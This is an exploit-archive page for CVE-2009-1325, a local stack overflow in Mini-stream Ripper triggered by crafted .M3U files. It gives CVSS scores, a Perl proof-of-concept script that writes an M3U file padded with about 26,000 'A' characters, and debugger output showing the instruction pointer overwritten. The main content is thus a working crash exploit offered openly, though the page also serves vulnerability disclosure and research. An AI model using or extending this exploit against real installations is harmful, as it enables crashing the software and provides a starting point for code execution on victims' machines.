Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Mini-stream Ripper (.M3U File) Local Stack Overflow PoC
2009.04.18
Credit:
Cyber-Zone
Risk:
High
Local:
Yes
Remote:
No
CVE:
CVE-2009-1325
CWE:
CWE-119
CVSS Base Score:
9.3/10
Impact Subscore:
10/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Complete
Integrity impact:
Complete
Availability impact:
Complete
#!/usr/bin/perl # # # ************************************************************* # * Mini-stream Ripper (.M3U File) Local Stack Overflow POC * # ************************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmail.fr # Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM # Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com # # Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe # # # Olly registers #EAX 00000001 #ECX 41414141 #EDX 00D30000 #EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u" #ESP 000F70CC ASCII "AAAA" #EBP 000FBFB4 #ESI 77C2FCE0 msvcrt.77C2FCE0 #EDI 0000CC2E #EIP 41414141 # my $Header = "#EXTM3U\n"; my $ex="http://"."A" x 26129; # note exact this just the POC open(MYFILE,'>>KHAL.m3u'); print MYFILE $Header.$ex; close(MYFILE);
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top